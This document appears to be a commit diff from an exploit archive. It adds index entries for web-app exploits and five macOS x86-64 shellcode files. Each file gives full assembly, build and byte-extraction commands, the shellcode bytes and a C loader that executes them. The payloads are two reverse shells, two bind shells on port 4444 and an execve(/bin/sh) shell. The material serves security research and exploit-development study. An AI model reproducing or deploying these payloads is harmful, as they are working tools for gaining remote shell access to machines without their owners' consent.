46387,exploits/php/webapps/46387.txt,"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection",2019-02-15,"Mehmet EMIROGLU",webapps,php,80
46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80
46398,exploits/php/webapps/46398.txt,"qdPM 9.1 - 'type' Cross-Site Scripting",2019-02-18,"Mehmet EMIROGLU",webapps,php,80
46399,exploits/php/webapps/46399.txt,"qdPM 9.1 - 'search[keywords]' Cross-Site Scripting",2019-02-18,"Mehmet EMIROGLU",webapps,php,80
46400,exploits/cgi/webapps/46400.py,"Master IP CAM 01 3.3.4.2103 - Remote Command Execution",2019-02-18,"Raffaele Sabato",webapps,cgi,80
46401,exploits/php/webapps/46401.py,"MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module",2019-02-18,Tm9jdGlz,webapps,php,80
46402,exploits/php/webapps/46402.txt,"CMSsite 1.0 - 'post' SQL Injection",2019-02-18,"Mr Winst0n",webapps,php,80
46404,exploits/multiple/webapps/46404.py,"M/Monit 3.7.2 - Privilege Escalation",2019-02-18,"Dolev Farhi",webapps,multiple,
46405,exploits/php/webapps/46405.txt,"Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload",2019-02-18,"Mehmet EMIROGLU",webapps,php,80
46406,exploits/multiple/webapps/46406.txt,"Apache CouchDB 2.3.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46407,exploits/multiple/webapps/46407.txt,"ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46408,exploits/multiple/webapps/46408.txt,"Comodo Dome Firewall 2.7.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46413,exploits/jsp/webapps/46413.txt,"Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload",2019-02-18,"Dao Duy Hung",webapps,jsp,
46414,exploits/php/webapps/46414.php,"WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing",2019-02-18,GeekHack,webapps,php,80

Can't render this file because it is too large.

5
files_shellcodes.csv
View file

@ -940,3 +940,8 @@ id,file,description,date,author,type,platform
46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86
46393,shellcodes/macos/46393.c,"macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46394,shellcodes/macos/46394.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46395,shellcodes/macos/46395.c,"macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos

1 id file description date author type platform
940 46277 shellcodes/linux_x86/46277.c Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes) 2019-01-29 Joao Batista shellcode linux_x86
941 46302 shellcodes/linux_x86/46302.c Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3) 2019-02-01 Kiewicz shellcode linux_x86
942 46323 shellcodes/linux_x86/46323.py Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator) 2019-02-05 Aditya Chaudhary shellcode linux_x86
943 46393 shellcodes/macos/46393.c macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) 2019-02-18 Ken Kitahara shellcode macos
944 46394 shellcodes/macos/46394.c macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes) 2019-02-18 Ken Kitahara shellcode macos
945 46395 shellcodes/macos/46395.c macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2019-02-18 Ken Kitahara shellcode macos
946 46396 shellcodes/macos/46396.c macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) 2019-02-18 Ken Kitahara shellcode macos
947 46397 shellcodes/macos/46397.c macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara shellcode macos

111
shellcodes/macos/46393.c Normal file
View file

@ -0,0 +1,111 @@
/*
# Title: macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c
dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat ipv6rev.s
section .text
global start
start:
; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi
mul rdi
mov dil, 0x1e
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
syscall
; struct sockaddr_in6 {
; __uint8_t sin6_len;
; sa_family_t sin6_family;
; in_port_t sin6_port;
; __uint32_t sin6_flowinfo;
; struct in6_addr sin6_addr;
; __uint32_t sin6_scope_id;
; };
xor rsi, rsi
push rsi
mov rbx, 0xfeffffffffffffff
not rbx
push rbx
push rsi
mov rsi, 0xffffffffa3eee1e4
neg rsi
push rsi
push rsp
pop rsi
; connect(sockid, &sockaddr, 28)
mov rdi, rax
xor dl, 0x1c
mov rax, r8
mov al, 0x62
syscall
xor rsi, rsi
mov sil, 0x3
dup2:
; dup2(sockid, 2)
; -> dup2(sockid, 1)
; -> dup2(sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
syscall
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rdx, rdx
mov rax, r8
mov al, 0x3b
syscall
dev:works devuser$ nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o
dev:works devuser$ for i in $(objdump -d ./ipv6rev.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x48\xbb\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd3\x53\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05
dev:works devuser$
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x48\xbb\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd3\x53\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}

122
shellcodes/macos/46394.c Normal file
View file

@ -0,0 +1,122 @@
/*
# Title: macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c
dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat ipv6bind.s
section .text
global start
start:
; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi
mul rdi
mov dil, 0x1e
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
syscall
; struct sockaddr_in6 {
; __uint8_t sin6_len;
; sa_family_t sin6_family;
; in_port_t sin6_port;
; __uint32_t sin6_flowinfo;
; struct in6_addr sin6_addr;
; __uint32_t sin6_scope_id;
; };
xor rsi, rsi
push rsi
push rsi
push rsi
mov rsi, 0xffffffffa3eee1e4
neg rsi
push rsi
push rsp
pop rsi
; bind(host_sockid, &sockaddr, 28)
mov rdi, rax
xor dl, 0x1c
mov rax, r8
mov al, 0x68
syscall
; listen(host_sockid, 2)
xor rsi, rsi
mov sil, 0x2
mov rax, r8
mov al, 0x6a
syscall
; accept(host_sockid, 0, 0)
xor rsi, rsi
xor rdx, rdx
mov rax, r8
mov al, 0x1e
syscall
mov rdi, rax
mov sil, 0x3
; dup2(client_sockid, 2)
; -> dup2(client_sockid, 1)
; -> dup2(client_sockid, 0)
dup2:
mov rax, r8
mov al, 0x5a
sub sil, 1
syscall
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
mov rax, r8
mov al, 0x3b
syscall
dev:works devuser$ nasm -f macho64 -o ipv6bind.o ipv6bind.s && ld -macosx_version_min 10.7.0 -o ipv6bind ipv6bind.o
dev:works devuser$ for i in $(objdump -d ./ipv6bind.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x56\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05
dev:works devuser$
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x56\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}

104
shellcodes/macos/46395.c Normal file
View file

@ -0,0 +1,104 @@
/*
# Title: macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c
dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat ipv4rev.s
section .text
global start
start:
; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi
mul rdi
mov dil, 0x2
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
syscall
; struct sockaddr_in {
; __uint8_t sin_len;
; sa_family_t sin_family;
; in_port_t sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
mov rsi, 0xfeffff80a3eefdf0
neg rsi
push rsi
push rsp
pop rsi
; connect(sockid, &sockaddr, 16)
mov rdi, rax
xor dl, 0x10
mov rax, r8
mov al, 0x62
syscall
xor rsi, rsi
mov sil, 0x3
dup2:
; dup2(sockid, 2)
; -> dup2(sockid, 1)
; -> dup2(sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
syscall
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rdx, rdx
mov rax, r8
mov al, 0x3b
syscall
dev:works devuser$ nasm -f macho64 -o ipv4rev.o ipv4rev.s && ld -macosx_version_min 10.7.0 -o ipv4rev ipv4rev.o
dev:works devuser$ for i in $(objdump -d ./ipv4rev.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xbe\xf0\xfd\xee\xa3\x80\xff\xff\xfe\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05
dev:works devuser$
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xbe\xf0\xfd\xee\xa3\x80\xff\xff\xfe\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}

117
shellcodes/macos/46396.c Normal file
View file

@ -0,0 +1,117 @@
/*
# Title: macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c
dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat ipv4bind.s
section .text
global start
start:
; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi
mul rdi
mov dil, 0x2
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
syscall
; struct sockaddr_in {
; __uint8_t sin_len;
; sa_family_t sin_family;
; in_port_t sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
mov rsi, 0xffffffffa3eefdf0
neg rsi
push rsi
push rsp
pop rsi
; bind(host_sockid, &sockaddr, 16)
mov rdi, rax
xor dl, 0x10
mov rax, r8
mov al, 0x68
syscall
; listen(host_sockid, 2)
xor rsi, rsi
mov sil, 0x2
mov rax, r8
mov al, 0x6a
syscall
; accept(host_sockid, 0, 0)
xor rsi, rsi
xor rdx, rdx
mov rax, r8
mov al, 0x1e
syscall
mov rdi, rax
mov sil, 0x3
dup2:
; dup2(client_sockid, 2)
; -> dup2(client_sockid, 1)
; -> dup2(client_sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
syscall
test rsi, rsi
jne dup2
; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
mov rax, r8
mov al, 0x3b
syscall
dev:works devuser$ nasm -f macho64 -o ipv4bind.o ipv4bind.s && ld -macosx_version_min 10.7.0 -o ipv4bind ipv4bind.o
dev:works devuser$ for i in $(objdump -d ./ipv4bind.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xc7\xc6\xf0\xfd\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05
dev:works devuser$
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xc7\xc6\xf0\xfd\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}

61
shellcodes/macos/46397.c Normal file
View file

@ -0,0 +1,61 @@
/*
# Title: macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c
dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat binsh.s
section .text
global start
start:
; execve("//bin/sh", 0, 0)
xor rax, rax
cdq
push rax
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rsi, rsi
mov al, 0x2
ror rax, 0x28
mov al, 0x3b
syscall
dev:works devuser$ nasm -f macho64 -o binsh.o binsh.s && ld -macosx_version_min 10.7.0 -o binsh binsh.o
dev:works devuser$ for i in $(objdump -d ./binsh.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x48\x31\xc0\x99\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xf6\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05
dev:works devuser$
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xc0\x99\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xf6\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}